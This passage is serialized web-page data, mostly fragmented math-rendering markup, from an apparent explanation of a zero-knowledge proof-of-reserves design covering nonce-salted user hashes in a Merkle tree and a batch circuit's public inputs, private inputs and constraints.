"u",{"type":24,"tag":301,"props":100005,"children":100007},{"className":100006,"style":99745},[10835,28357],[100008],{"type":30,"value":100009},"ser",{"type":24,"tag":301,"props":100011,"children":100013},{"className":100012,"style":99745},[10835],[100014],{"type":30,"value":9918},{"type":24,"tag":301,"props":100016,"children":100018},{"className":100017},[10835,28357],[100019],{"type":30,"value":10564},{"type":24,"tag":301,"props":100021,"children":100023},{"className":100022},[10835,28357],[100024],{"type":30,"value":77277},{"type":24,"tag":301,"props":100026,"children":100028},{"className":100027},[28508],[100029],{"type":30,"value":9961},{"type":24,"tag":301,"props":100031,"children":100033},{"className":100032},[10914],[100034],{"type":30,"value":28458},{"type":24,"tag":301,"props":100036,"children":100038},{"className":100037},[10835],[100039],{"type":30,"value":99843},{"type":24,"tag":301,"props":100041,"children":100043},{"className":100042},[10914],[100044],{"type":30,"value":28458},{"type":24,"tag":301,"props":100046,"children":100048},{"className":100047},[10835,28357],[100049],{"type":30,"value":100003},{"type":24,"tag":301,"props":100051,"children":100053},{"className":100052,"style":99745},[10835,28357],[100054],{"type":30,"value":100009},{"type":24,"tag":301,"props":100056,"children":100058},{"className":100057,"style":99745},[10835],[100059],{"type":30,"value":9918},{"type":24,"tag":301,"props":100061,"children":100063},{"className":100062},[10835,28357],[100064],{"type":30,"value":63123},{"type":24,"tag":301,"props":100066,"children":100068},{"className":100067},[10835,28357],[100069],{"type":30,"value":99715},{"type":24,"tag":301,"props":100071,"children":100073},{"className":100072},[10835,28357],[100074],{"type":30,"value":63123},{"type":24,"tag":301,"props":100076,"children":100078},{"className":100077},[10835,28357],[100079],{"type":30,"value":99772},{"type":24,"tag":301,"props":100081,"children":100083},{"className":100082},[28508],[100084],{"type":30,"value":9961},{"type":24,"tag":32,"props":100086,"children":100087},{},[100088,100090,100096],{"type":30,"value":100089},"In other words, all balances are concatenated with the hashed user ID (which can be a ",{"type":24,"tag":145,"props":100091,"children":100093},{"className":100092},[],[100094],{"type":30,"value":100095},"uuid",{"type":30,"value":100097},", a username or an incremental ID) and with a nonce. The nonce is a random number that serves as a security measure against attackers who could brute-force the hash to find out other users' balances. Since the Merkle tree is a public proof, we need to be careful against these types of data leaks.",{"type":24,"tag":80,"props":100099,"children":100101},{"id":100100},"batch-circuit",[100102],{"type":30,"value":100103},"Batch Circuit",{"type":24,"tag":32,"props":100105,"children":100106},{},[100107],{"type":30,"value":100108},"The batch circuit is the first proven circuit in the PoR algorithm. It receives the account's information (grouped in 512) and generates the ZK proof with those constraints:",{"type":24,"tag":32,"props":100110,"children":100111},{},[100112],{"type":24,"tag":60,"props":100113,"children":100114},{},[100115],{"type":30,"value":100116},"Public Inputs",{"type":24,"tag":2655,"props":100118,"children":100119},{},[100120,100125,100130],{"type":24,"tag":2659,"props":100121,"children":100122},{},[100123],{"type":30,"value":100124},"Asset prices in USD",{"type":24,"tag":2659,"props":100126,"children":100127},{},[100128],{"type":30,"value":100129},"Merkle tree hash",{"type":24,"tag":2659,"props":100131,"children":100132},{},[100133],{"type":30,"value":100134},"Summed asset balances",{"type":24,"tag":32,"props":100136,"children":100137},{},[100138],{"type":24,"tag":60,"props":100139,"children":100140},{},[100141],{"type":30,"value":100142},"Private Inputs",{"type":24,"tag":2655,"props":100144,"children":100145},{},[100146,100151],{"type":24,"tag":2659,"props":100147,"children":100148},{},[100149],{"type":30,"value":100150},"Users balances",{"type":24,"tag":2659,"props":100152,"children":100153},{},[100154],{"type":30,"value":100155},"Merkle tree leaves hashes",{"type":24,"tag":32,"props":100157,"children":100158},{},[100159],{"type":24,"tag":60,"props":100160,"children":100161},{},[100162],{"type":30,"value":100163},"Constraints",{"type":24,"tag":2655,"props":100165,"children":100166},{},[100167,100620,100788,101135,101533],{"type":24,"tag":2659,"props":100168,"children":100169},{},[100170],{"type":24,"tag":145,"props":100171,"children":100173},{"className":100172},[10807,10808],[100174],{"type":24,"tag":301,"props":100175,"children":100177},{"className":100176},[10813],[100178],{"type":24,"tag":301,"props":100179,"children":100181},{"className":100180,"ariaHidden":10819},[10818],[100182,100321,100525],{"type":24,"tag":301,"props":100183,"children":100185},{"className":100184},[10824],[100186,100191,100196,100202,100207,100212,100217,100222,100227,100234,100239,100244,100249,100308,100312,100317],{"type":24,"tag":301,"props":100187,"children":100190},{"className":100188,"style":100189},[10829],"height:0.9695em;vertical-align:-0.31em;",[],{"type":24,"tag":301,"props":100192,"children":100194},{"className":100193},[10835,28357],[100195],{"type":30,"value":188},{"type":24,"tag":301,"props":100197,"children":100199},{"className":100198},[10835,28357],[100200],{"type":30,"value":100201},"cco",{"type":24,"tag":301,"props":100203,"children":100205},{"className":100204},[10835,28357],[100206],{"type":30,"value":100003},{"type":24,"tag":301,"props":100208,"children":100210},{"className":100209},[10835,28357],[100211],{"type":30,"value":63123},{"type":24,"tag":301,"props":100213,"children":100215},{"className":100214},[10835,28357],[100216],{"type":30,"value":28499},{"type":24,"tag":301,"props":100218,"children":100220},{"className":100219,"style":99745},[10835],[100221],{"type":30,"value":9918},{"type":24,"tag":301,"props":100223,"children":100225},{"className":100224},[10835,28357],[100226],{"type":30,"value":58179},{"type":24,"tag":301,"props":100228,"children":100231},{"className":100229,"style":100230},[10835,28357],"margin-right:0.03588em;",[100232],{"type":30,"value":100233},"q",{"type":24,"tag":301,"props":100235,"children":100237},{"className":100236},[10835,28357],[100238],{"type":30,"value":100003},{"type":24,"tag":301,"props":100240,"children":100242},{"className":100241},[10835,28357],[100243],{"type":30,"value":10564},{"type":24,"tag":301,"props":100245,"children":100247},{"className":100246},[10835,28357],[100248],{"type":30,"value":28499},{"type":24,"tag":301,"props":100250,"children":100252},{"className":100251},[10835],[100253,100258],{"type":24,"tag":301,"props":100254,"children":100256},{"className":100255,"style":100230},[10835,28357],[100257],{"type":30,"value":9948},{"type":24,"tag":301,"props":100259,"children":100261},{"className":100260},[10850],[100262],{"type":24,"tag":301,"props":100263,"children":100265},{"className":100264},[10855,28411],[100266,100297],{"type":24,"tag":301,"props":100267,"children":100269},{"className":100268},[10860],[100270,100292],{"type":24,"tag":301,"props":100271,"children":100274},{"className":100272,"style":100273},[10865],"height:0.3117em;",[100275],{"type":24,"tag":301,"props":100276,"children":100278},{"style":100277},"top:-2.55em;margin-left:-0.0359em;margin-right:0.05em;",[100279,100283],{"type":24,"tag":301,"props":100280,"children":100282},{"className":100281,"style":10875},[10874],[],{"type":24,"tag":301,"props":100284,"children":100286},{"className":100285},[10880,10881,10882,10883],[100287],{"type":24,"tag":301,"props":100288,"children":100290},{"className":100289},[10835,28357,10883],[100291],{"type":30,"value":10564},{"type":24,"tag":301,"props":100293,"children":100295},{"className":100294},[28514],[100296],{"type":30,"value":28517},{"type":24,"tag":301,"props":100298,"children":100300},{"className":100299},[10860],[100301],{"type":24,"tag":301,"props":100302,"children":100304},{"className":100303,"style":99828},[10865],[100305],{"type":24,"tag":301,"props":100306,"children":100307},{},[],{"type":24,"tag":301,"props":100309,"children":100311},{"className":100310,"style":11012},[10914],[],{"type":24,"tag":301,"props":100313,"children":100315},{"className":100314},[11017],[100316],{"type":30,"value":607},{"type":24,"tag":301,"props":100318,"children":100320},{"className":100319,"style":11012},[10914],[],{"type":24,"tag":301,"props":100322,"children":100324},{"className":100323},[10824],[100325,100329,100335,100340,100345,100350,100355,100360,100365,100370,100375,100380,100385,100390,100395,100400,100405,100410,100467,100472,100477,100482,100487,100492,100497,100502,100507,100512,100516,100521],{"type":24,"tag":301,"props":100326,"children":100328},{"className":100327,"style":99687},[10829],[],{"type":24,"tag":301,"props":100330,"children":100332},{"className":100331},[10835],[100333],{"type":30,"value":100334},"Σ",{"type":24,"tag":301,"props":100336,"children":100338},{"className":100337},[10914],[100339],{"type":30,"value":28458},{"type":24,"tag":301,"props":100341,"children":100343},{"className":100342},[10835,28357],[100344],{"type":30,"value":188},{"type":24,"tag":301,"props":100346,"children":100348},{"className":100347},[10835,28357],[100349],{"type":30,"value":100201},{"type":24,"tag":301,"props":100351,"children":100353},{"className":100352},[10835,28357],[100354],{"type":30,"value":100003},{"type":24,"tag":301,"props":100356,"children":100358},{"className":100357},[10835,28357],[100359],{"type":30,"value":63123},{"type":24,"tag":301,"props":100361,"children":100363},{"className":100362},[10835,28357],[100364],{"type":30,"value":28499},{"type":24,"tag":301,"props":100366,"children":100368},{"className":100367,"style":99745},[10835],[100369],{"type":30,"value":9918},{"type":24,"tag":301,"props":100371,"children":100373},{"className":100372},[10835,28357],[100374],{"type":30,"value":188},{"type":24,"tag":301,"props":100376,"children":100378},{"className":100377},[10835,28357],[100379],{"type":30,"value":99736},{"type":24,"tag":301,"props":100381,"children":100383},{"className":100382},[10835,28357],[100384],{"type":30,"value":28499},{"type":24,"tag":301,"props":100386,"children":100388},{"className":100387,"style":99745},[10835],[100389],{"type":30,"value":9918},{"type":24,"tag":301,"props":100391,"children":100393},{"className":100392},[10835,28357],[100394],{"type":30,"value":99753},{"type":24,"tag":301,"props":100396,"children":100398},{"className":100397,"style":99757},[10835,28357],[100399],{"type":30,"value":99760},{"type":24,"tag":301,"props":100401,"children":100403},{"className":100402},[10835,28357],[100404],{"type":30,"value":99766},{"type":24,"tag":301,"props":100406,"children":100408},{"className":100407},[10835,28357],[100409],{"type":30,"value":99772},{"type":24,"tag":301,"props":100411,"children":100413},{"className":100412},[10835],[100414,100419],{"type":24,"tag":301,"props":100415,"children":100417},{"className":100416},[10835,28357],[100418],{"type":30,"value":1724},{"type":24,"tag":301,"props":100420,"children":100422},{"className":100421},[10850],[100423],{"type":24,"tag":301,"props":100424,"children":100426},{"className":100425},[10855,28411],[100427,100456],{"type":24,"tag":301,"props":100428,"children":100430},{"className":100429},[10860],[100431,100451],{"type":24,"tag":301,"props":100432,"children":100434},{"className":100433,"style":100273},[10865],[100435],{"type":24,"tag":301,"props":100436,"children":100437},{"style":99801},[100438,100442],{"type":24,"tag":301,"props":100439,"children":100441},{"className":100440,"style":10875},[10874],[],{"type":24,"tag":301,"props":100443,"children":100445},{"className":100444},[10880,10881,10882,10883],[100446],{"type":24,"tag":301,"props":100447,"children":100449},{"className":100448},[10835,28357,10883],[100450],{"type":30,"value":10564},{"type":24,"tag":301,"props":100452,"children":100454},{"className":100453},[28514],[100455],{"type":30,"value":28517},{"type":24,"tag":301,"props":100457,"children":100459},{"className":100458},[10860],[100460],{"type":24,"tag":301,"props":100461,"children":100463},{"className":100462,"style":99828},[10865],[100464],{"type":24,"tag":301,"props":100465,"children":100466},{},[],{"type":24,"tag":301,"props":100468,"children":100470},{"className":100469},[28486],[100471],{"type":30,"value":541},{"type":24,"tag":301,"props":100473,"children":100475},{"className":100474},[10835,28357],[100476],{"type":30,"value":188},{"type":24,"tag":301,"props":100478,"children":100480},{"className":100479},[10835,28357],[100481],{"type":30,"value":99736},{"type":24,"tag":301,"props":100483,"children":100485},{"className":100484},[10835,28357],[100486],{"type":30,"value":28499},{"type":24,"tag":301,"props":100488,"children":100490},{"className":100489,"style":99745},[10835],[100491],{"type":30,"value":9918},{"type":24,"tag":301,"props":100493,"children":100495},{"className":100494},[10835,28357],[100496],{"type":30,"value":63123},{"type":24,"tag":301,"props":100498,"children":100500},{"className":100499},[10835,28357],[100501],{"type":30,"value":100003},{"type":24,"tag":301,"props":100503,"children":100505},{"className":100504},[10835,28357],[100506],{"type":30,"value":57861},{"type":24,"tag":301,"props":100508,"children":100510},{"className":100509},[28508],[100511],{"type":30,"value":22200},{"type":24,"tag":301,"props":100513,"children":100515},{"className":100514,"style":10915},[10914],[],{"type":24,"tag":301,"props":100517,"children":100519},{"className":100518},[10920],[100520],{"type":30,"value":10923},{"type":24,"tag":301,"props":100522,"children":100524},{"className":100523,"style":10915},[10914],[],{"type":24,"tag":301,"props":100526,"children":100528},{"className":100527},[10824],[100529,100533,100538,100543,100548,100553,100558,100564,100569,100575,100580,100585,100590,100595,100600,100605,100610,100615],{"type":24,"tag":301,"props":100530,"children":100532},{"className":100531,"style":99687},[10829],[],{"type":24,"tag":301,"props":100534,"children":100536},{"className":100535},[10835,28357],[100537],{"type":30,"value":188},{"type":24,"tag":301,"props":100539,"children":100541},{"className":100540},[10835,28357],[100542],{"type":30,"value":99736},{"type":24,"tag":301,"props":100544,"children":100546},{"className":100545},[10835,28357],[100547],{"type":30,"value":28499},{"type":24,"tag":301,"props":100549,"children":100551},{"className":100550,"style":99745},[10835],[100552],{"type":30,"value":9918},{"type":24,"tag":301,"props":100554,"children":100556},{"className":100555},[10835,28357],[100557],{"type":30,"value":32},{"type":24,"tag":301,"props":100559,"children":100561},{"className":100560,"style":99745},[10835,28357],[100562],{"type":30,"value":100563},"r",{"type":24,"tag":301,"props":100565,"children":100567},{"className":100566},[10835,28357],[100568],{"type":30,"value":10564},{"type":24,"tag":301,"props":100570,"children":100572},{"className":100571},[10835,28357],[100573],{"type":30,"value":100574},"ces",{"type":24,"tag":301,"props":100576,"children":100578},{"className":100577},[28486],[100579],{"type":30,"value":541},{"type":24,"tag":301,"props":100581,"children":100583},{"className":100582},[10835,28357],[100584],{"type":30,"value":188},{"type":24,"tag":301,"props":100586,"children":100588},{"className":100587},[10835,28357],[100589],{"type":30,"value":99736},{"type":24,"tag":301,"props":100591,"children":100593},{"className":100592},[10835,28357],[100594],{"type":30,"value":28499},{"type":24,"tag":301,"props":100596,"children":100598},{"className":100597,"style":99745},[10835],[100599],{"type":30,"value":9918},{"type":24,"tag":301,"props":100601,"children":100603},{"className":100602},[10835,28357],[100604],{"type":30,"value":63123},{"type":24,"tag":301,"props":100606,"children":100608},{"className":100607},[10835,28357],[100609],{"type":30,"value":100003},{"type":24,"tag":301,"props":100611,"children":100613},{"className":100612},[10835,28357],[100614],{"type":30,"value":57861},{"type":24,"tag":301,"props":100616,"children":100618},{"className":100617},[28508],[100619],{"type":30,"value":22200},{"type":24,"tag":2659,"props":100621,"children":100622},{},[100623,100782,100783],{"type":24,"tag":145,"props":100624,"children":100626},{"className":100625},[10807,10808],[100627],{"type":24,"tag":301,"props":100628,"children":100630},{"className":100629},[10813],[100631],{"type":24,"tag":301,"props":100632,"children":100634},{"className":100633,"ariaHidden":10819},[10818],[100635,100768],{"type":24,"tag":301,"props":100636,"children":100638},{"className":100637},[10824],[100639,100643,100648,100653,100658,100663,100668,100673,100678,100683,100688,100693,100698,100755,100759,100764],{"type":24,"tag":301,"props":100640,"children":100642},{"className":100641,"style":100189},[10829],[],{"type":24,"tag":301,"props":100644,"children":100646},{"className":100645},[10835,28357],[100647],{"type":30,"value":188},{"type":24,"tag":301,"props":100649,"children":100651},{"className":100650},[10835,28357],[100652],{"type":30,"value":100201},{"type":24,"tag":301,"props":100654,"children":100656},{"className":100655},[10835,28357],[100657],{"type":30,"value":100003},{"type":24,"tag":301,"props":100659,"children":100661},{"className":100660},[10835,28357],[100662],{"type":30,"value":63123},{"type":24,"tag":301,"props":100664,"children":100666},{"className":100665},[10835,28357],[100667],{"type":30,"value":28499},{"type":24,"tag":301,"props":100669,"children":100671},{"className":100670,"style":99745},[10835],[100672],{"type":30,"value":9918},{"type":24,"tag":301,"props":100674,"children":100676},{"className":100675},[10835,28357],[100677],{"type":30,"value":58179},{"type":24,"tag":301,"props":100679,"children":100681},{"className":100680,"style":100230},[10835,28357],[100682],{"type":30,"value":100233},{"type":24,"tag":301,"props":100684,"children":100686},{"className":100685},[10835,28357],[100687],{"type":30,"value":100003},{"type":24,"tag":301,"props":100689,"children":100691},{"className":100690},[10835,28357],[100692],{"type":30,"value":10564},{"type":24,"tag":301,"props":100694,"children":100696},{"className":100695},[10835,28357],[100697],{"type":30,"value":28499},{"type":24,"tag":301,"props":100699,"children":100701},{"className":100700},[10835],[100702,100707],{"type":24,"tag":301,"props":100703,"children":100705},{"className":100704,"style":100230},[10835,28357],[100706],{"type":30,"value":9948},{"type":24,"tag":301,"props":100708,"children":100710},{"className":100709},[10850],[100711],{"type":24,"tag":301,"props":100712,"children":100714},{"className":100713},[10855,28411],[100715,100744],{"type":24,"tag":301,"props":100716,"children":100718},{"className":100717},[10860],[100719,100739],{"type":24,"tag":301,"props":100720,"children":100722},{"className":100721,"style":100273},[10865],[100723],{"type":24,"tag":301,"props":100724,"children":100725},{"style":100277},[100726,100730],{"type":24,"tag":301,"props":100727,"children":100729},{"className":100728,"style":10875},[10874],[],{"type":24,"tag":301,"props":100731,"children":100733},{"className":100732},[10880,10881,10882,10883],[100734],{"type":24,"tag":301,"props":100735,"children":100737},{"className":100736},[10835,28357,10883],[100738],{"type":30,"value":10564},{"type":24,"tag":301,"props":100740,"children":100742},{"className":100741},[28514],[100743],{"type":30,"value":28517},{"type":24,"tag":301,"props":100745,"children":100747},{"className":100746},[10860],[100748],{"type":24,"tag":301,"props":100749,"children":100751},{"className":100750,"style":99828},[10865],[100752],{"type":24,"tag":301,"props":100753,"children":100754},{},[],{"type":24,"tag":301,"props":100756,"children":100758},{"className":100757,"style":11012},[10914],[],{"type":24,"tag":301,"props":100760,"children":100762},{"className":100761},[11017],[100763],{"type":30,"value":16748},{"type":24,"tag":301,"props":100765,"children":100767},{"className":100766,"style":11012},[10914],[],{"type":24,"tag":301,"props":100769,"children":100771},{"className":100770},[10824],[100772,100777],{"type":24,"tag":301,"props":100773,"children":100776},{"className":100774,"style":100775},[10829],"height:0.6444em;",[],{"type":24,"tag":301,"props":100778,"children":100780},{"className":100779},[10835],[100781],{"type":30,"value":584},{"type":30,"value":13277},{"type":24,"tag":60,"props":100784,"children":100785},{},[100786],{"type":30,"value":100787},"(non-negativity)",{"type":24,"tag":2659,"props":100789,"children":100790},{},[100791,101129,101130],{"type":24,"tag":145,"props":100792,"children":100794},{"className":100793},[10807,10808],[100795],{"type":24,"tag":301,"props":100796,"children":100798},{"className":100797},[10813],[100799],{"type":24,"tag":301,"props":100800,"children":100802},{"className":100801,"ariaHidden":10819},[10818],[100803,100939],{"type":24,"tag":301,"props":100804,"children":100806},{"className":100805},[10824],[100807,100811,100816,100821,100826,100831,100836,100841,100846,100851,100856,100861,100866,100871,100876,100881,100886,100891,100896,100901,100906,100911,100916,100921,100926,100930,100935],{"type":24,"tag":301,"props":100808,"children":100810},{"className":100809,"style":99687},[10829],[],{"type":24,"tag":301,"props":100812,"children":100814},{"className":100813},[10835,28357],[100815],{"type":30,"value":28499},{"type":24,"tag":301,"props":100817,"children":100819},{"className":100818},[10835,28357],[100820],{"type":30,"value":99715},{"type":24,"tag":301,"props":100822,"children":100824},{"className":100823},[10835,28357],[100825],{"type":30,"value":28499},{"type":24,"tag":301,"props":100827,"children":100829},{"className":100828},[10835,28357],[100830],{"type":30,"value":188},{"type":24,"tag":301,"props":100832,"children":100834},{"className":100833,"style":99757},[10835,28357],[100835],{"type":30,"value":99760},{"type":24,"tag":301,"props":100837,"children":100839},{"className":100838,"style":99745},[10835],[100840],{"type":30,"value":9918},{"type":24,"tag":301,"props":100842,"children":100844},{"className":100843},[10835,28357],[100845],{"type":30,"value":188},{"type":24,"tag":301,"props":100847,"children":100849},{"className":100848},[10835,28357],[100850],{"type":30,"value":99736},{"type":24,"tag":301,"props":100852,"children":100854},{"className":100853},[10835,28357],[100855],{"type":30,"value":28499},{"type":24,"tag":301,"props":100857,"children":100859},{"className":100858,"style":99745},[10835],[100860],{"type":30,"value":9918},{"type":24,"tag":301,"props":100862,"children":100864},{"className":100863},[10835,28357],[100865],{"type":30,"value":99753},{"type":24,"tag":301,"props":100867,"children":100869},{"className":100868,"style":99757},[10835,28357],[100870],{"type":30,"value":99760},{"type":24,"tag":301,"props":100872,"children":100874},{"className":100873},[10835,28357],[100875],{"type":30,"value":99766},{"type":24,"tag":301,"props":100877,"children":100879},{"className":100878},[10835,28357],[100880],{"type":30,"value":99772},{"type":24,"tag":301,"props":100882,"children":100884},{"className":100883},[28486],[100885],{"type":30,"value":541},{"type":24,"tag":301,"props":100887,"children":100889},{"className":100888},[10835,28357],[100890],{"type":30,"value":188},{"type":24,"tag":301,"props":100892,"children":100894},{"className":100893},[10835,28357],[100895],{"type":30,"value":99736},{"type":24,"tag":301,"props":100897,"children":100899},{"className":100898},[10835,28357],[100900],{"type":30,"value":28499},{"type":24,"tag":301,"props":100902,"children":100904},{"className":100903,"style":99745},[10835],[100905],{"type":30,"value":9918},{"type":24,"tag":301,"props":100907,"children":100909},{"className":100908},[10835,28357],[100910],{"type":30,"value":63123},{"type":24,"tag":301,"props":100912,"children":100914},{"className":100913},[10835,28357],[100915],{"type":30,"value":100003},{"type":24,"tag":301,"props":100917,"children":100919},{"className":100918},[10835,28357],[100920],{"type":30,"value":57861},{"type":24,"tag":301,"props":100922,"children":100924},{"className":100923},[28508],[100925],{"type":30,"value":22200},{"type":24,"tag":301,"props":100927,"children":100929},{"className":100928,"style":11012},[10914],[],{"type":24,"tag":301,"props":100931,"children":100933},{"className":100932},[11017],[100934],{"type":30,"value":607},{"type":24,"tag":301,"props":100936,"children":100938},{"className":100937,"style":11012},[10914],[],{"type":24,"tag":301,"props":100940,"children":100942},{"className":100941},[10824],[100943,100947,100952,100957,100962,100967,100972,100977,100982,100987,100992,100997,101002,101007,101012,101017,101022,101027,101084,101089,101094,101099,101104,101109,101114,101119,101124],{"type":24,"tag":301,"props":100944,"children":100946},{"className":100945,"style":99687},[10829],[],{"type":24,"tag":301,"props":100948,"children":100950},{"className":100949},[10835],[100951],{"type":30,"value":100334},{"type":24,"tag":301,"props":100953,"children":100955},{"className":100954},[10914],[100956],{"type":30,"value":28458},{"type":24,"tag":301,"props":100958,"children":100960},{"className":100959},[10835,28357],[100961],{"type":30,"value":188},{"type":24,"tag":301,"props":100963,"children":100965},{"className":100964},[10835,28357],[100966],{"type":30,"value":100201},{"type":24,"tag":301,"props":100968,"children":100970},{"className":100969},[10835,28357],[100971],{"type":30,"value":100003},{"type":24,"tag":301,"props":100973,"children":100975},{"className":100974},[10835,28357],[100976],{"type":30,"value":63123},{"type":24,"tag":301,"props":100978,"children":100980},{"className":100979},[10835,28357],[100981],{"type":30,"value":28499},{"type":24,"tag":301,"props":100983,"children":100985},{"className":100984,"style":99745},[10835],[100986],{"type":30,"value":9918},{"type":24,"tag":301,"props":100988,"children":100990},{"className":100989},[10835,28357],[100991],{"type":30,"value":188},{"type":24,"tag":301,"props":100993,"children":100995},{"className":100994},[10835,28357],[100996],{"type":30,"value":99736},{"type":24,"tag":301,"props":100998,"children":101000},{"className":100999},[10835,28357],[101001],{"type":30,"value":28499},{"type":24,"tag":301,"props":101003,"children":101005},{"className":101004,"style":99745},[10835],[101006],{"type":30,"value":9918},{"type":24,"tag":301,"props":101008,"children":101010},{"className":101009},[10835,28357],[101011],{"type":30,"value":99753},{"type":24,"tag":301,"props":101013,"children":101015},{"className":101014,"style":99757},[10835,28357],[101016],{"type":30,"value":99760},{"type":24,"tag":301,"props":101018,"children":101020},{"className":101019},[10835,28357],[101021],{"type":30,"value":99766},{"type":24,"tag":301,"props":101023,"children":101025},{"className":101024},[10835,28357],[101026],{"type":30,"value":99772},{"type":24,"tag":301,"props":101028,"children":101030},{"className":101029},[10835],[101031,101036],{"type":24,"tag":301,"props":101032,"children":101034},{"className":101033},[10835,28357],[101035],{"type":30,"value":1724},{"type":24,"tag":301,"props":101037,"children":101039},{"className":101038},[10850],[101040],{"type":24,"tag":301,"props":101041,"children":101043},{"className":101042},[10855,28411],[101044,101073],{"type":24,"tag":301,"props":101045,"children":101047},{"className":101046},[10860],[101048,101068],{"type":24,"tag":301,"props":101049,"children":101051},{"className":101050,"style":100273},[10865],[101052],{"type":24,"tag":301,"props":101053,"children":101054},{"style":99801},[101055,101059],{"type":24,"tag":301,"props":101056,"children":101058},{"className":101057,"style":10875},[10874],[],{"type":24,"tag":301,"props":101060,"children":101062},{"className":101061},[10880,10881,10882,10883],[101063],{"type":24,"tag":301,"props":101064,"children":101066},{"className":101065},[10835,28357,10883],[101067],{"type":30,"value":10564},{"type":24,"tag":301,"props":101069,"children":101071},{"className":101070},[28514],[101072],{"type":30,"value":28517},{"type":24,"tag":301,"props":101074,"children":101076},{"className":101075},[10860],[101077],{"type":24,"tag":301,"props":101078,"children":101080},{"className":101079,"style":99828},[10865],[101081],{"type":24,"tag":301,"props":101082,"children":101083},{},[],{"type":24,"tag":301,"props":101085,"children":101087},{"className":101086},[28486],[101088],{"type":30,"value":541},{"type":24,"tag":301,"props":101090,"children":101092},{"className":101091},[10835,28357],[101093],{"type":30,"value":188},{"type":24,"tag":301,"props":101095,"children":101097},{"className":101096},[10835,28357],[101098],{"type":30,"value":99736},{"type":24,"tag":301,"props":101100,"children":101102},{"className":101101},[10835,28357],[101103],{"type":30,"value":28499},{"type":24,"tag":301,"props":101105,"children":101107},{"className":101106,"style":99745},[10835],[101108],{"type":30,"value":9918},{"type":24,"tag":301,"props":101110,"children":101112},{"className":101111},[10835,28357],[101113],{"type":30,"value":63123},{"type":24,"tag":301,"props":101115,"children":101117},{"className":101116},[10835,28357],[101118],{"type":30,"value":100003},{"type":24,"tag":301,"props":101120,"children":101122},{"className":101121},[10835,28357],[101123],{"type":30,"value":57861},{"type":24,"tag":301,"props":101125,"children":101127},{"className":101126},[28508],[101128],{"type":30,"value":22200},{"type":30,"value":13277},{"type":24,"tag":60,"props":101131,"children":101132},{},[101133],{"type":30,"value":101134},"(sum proof)",{"type":24,"tag":2659,"props":101136,"children":101137},{},[101138,101527,101528],{"type":24,"tag":145,"props":101139,"children":101141},{"className":101140},[10807,10808],[101142],{"type":24,"tag":301,"props":101143,"children":101145},{"className":101144},[10813],[101146],{"type":24,"tag":301,"props":101147,"children":101149},{"className":101148,"ariaHidden":10819},[10818],[101150,101236],{"type":24,"tag":301,"props":101151,"children":101153},{"className":101152},[10824],[101154,101159,101164,101170,101176,101181,101186,101191,101196,101202,101207,101213,101218,101223,101227,101232],{"type":24,"tag":301,"props":101155,"children":101158},{"className":101156,"style":101157},[10829],"height:1.0044em;vertical-align:-0.31em;",[],{"type":24,"tag":301,"props":101160,"children":101162},{"className":101161},[10835,28357],[101163],{"type":30,"value":57861},{"type":24,"tag":301,"props":101165,"children":101167},{"className":101166,"style":99745},[10835,28357],[101168],{"type":30,"value":101169},"er",{"type":24,"tag":301,"props":101171,"children":101174},{"className":101172,"style":101173},[10835,28357],"margin-right:0.03148em;",[101175],{"type":30,"value":95387},{"type":24,"tag":301,"props":101177,"children":101179},{"className":101178,"style":99757},[10835,28357],[101180],{"type":30,"value":99760},{"type":24,"tag":301,"props":101182,"children":101184},{"className":101183},[10835,28357],[101185],{"type":30,"value":58179},{"type":24,"tag":301,"props":101187,"children":101189},{"className":101188,"style":99745},[10835],[101190],{"type":30,"value":9918},{"type":24,"tag":301,"props":101192,"children":101194},{"className":101193},[10835,28357],[101195],{"type":30,"value":28499},{"type":24,"tag":301,"props":101197,"children":101199},{"className":101198},[10835,28357],[101200],{"type":30,"value":101201},"ree",{"type":24,"tag":301,"props":101203,"children":101205},{"className":101204,"style":99745},[10835],[101206],{"type":30,"value":9918},{"type":24,"tag":301,"props":101208,"children":101210},{"className":101209},[10835,28357],[101211],{"type":30,"value":101212},"ha",{"type":24,"tag":301,"props":101214,"children":101216},{"className":101215},[10835,28357],[101217],{"type":30,"value":1724},{"type":24,"tag":301,"props":101219,"children":101221},{"className":101220},[10835,28357],[101222],{"type":30,"value":2597},{"type":24,"tag":301,"props":101224,"children":101226},{"className":101225,"style":11012},[10914],[],{"type":24,"tag":301,"props":101228,"children":101230},{"className":101229},[11017],[101231],{"type":30,"value":607},{"type":24,"tag":301,"props":101233,"children":101235},{"className":101234,"style":11012},[10914],[],{"type":24,"tag":301,"props":101237,"children":101239},{"className":101238},[10824],[101240,101244,101249,101254,101259,101264,101269,101274,101279,101284,101289,101346,101351,101355,101360,101365,101422,101427,101432,101436,101441,101446,101450,101455,101460,101522],{"type":24,"tag":301,"props":101241,"children":101243},{"className":101242,"style":10935},[10829],[],{"type":24,"tag":301,"props":101245,"children":101247},{"className":101246,"style":28358},[10835,28357],[101248],{"type":30,"value":28361},{"type":24,"tag":301,"props":101250,"children":101252},{"className":101251},[10835,28357],[101253],{"type":30,"value":99699},{"type":24,"tag":301,"props":101255,"children":101257},{"className":101256},[10835,28357],[101258],{"type":30,"value":10564},{"type":24,"tag":301,"props":101260,"children":101262},{"className":101261},[10835,28357],[101263],{"type":30,"value":77277},{"type":24,"tag":301,"props":101265,"children":101267},{"className":101266},[10835,28357],[101268],{"type":30,"value":99715},{"type":24,"tag":301,"props":101270,"children":101272},{"className":101271},[10835,28357],[101273],{"type":30,"value":63123},{"type":24,"tag":301,"props":101275,"children":101277},{"className":101276},[28486],[101278],{"type":30,"value":362},{"type":24,"tag":301,"props":101280,"children":101282},{"className":101281},[10835,28357],[101283],{"type":30,"value":101212},{"type":24,"tag":301,"props":101285,"children":101287},{"className":101286},[10835,28357],[101288],{"type":30,"value":1724},{"type":24,"tag":301,"props":101290,"children":101292},{"className":101291},[10835],[101293,101298],{"type":24,"tag":301,"props":101294,"children":101296},{"className":101295},[10835,28357],[101297],{"type":30,"value":2597},{"type":24,"tag":301,"props":101299,"children":101301},{"className":101300},[10850],[101302],{"type":24,"tag":301,"props":101303,"children":101305},{"className":101304},[10855,28411],[101306,101335],{"type":24,"tag":301,"props":101307,"children":101309},{"className":101308},[10860],[101310,101330],{"type":24,"tag":301,"props":101311,"children":101313},{"className":101312,"style":99797},[10865],[101314],{"type":24,"tag":301,"props":101315,"children":101316},{"style":99801},[101317,101321],{"type":24,"tag":301,"props":101318,"children":101320},{"className":101319,"style":10875},[10874],[],{"type":24,"tag":301,"props":101322,"children":101324},{"className":101323},[10880,10881,10882,10883],[101325],{"type":24,"tag":301,"props":101326,"children":101328},{"className":101327},[10835,10883],[101329],{"type":30,"value":584},{"type":24,"tag":301,"props":101331,"children":101333}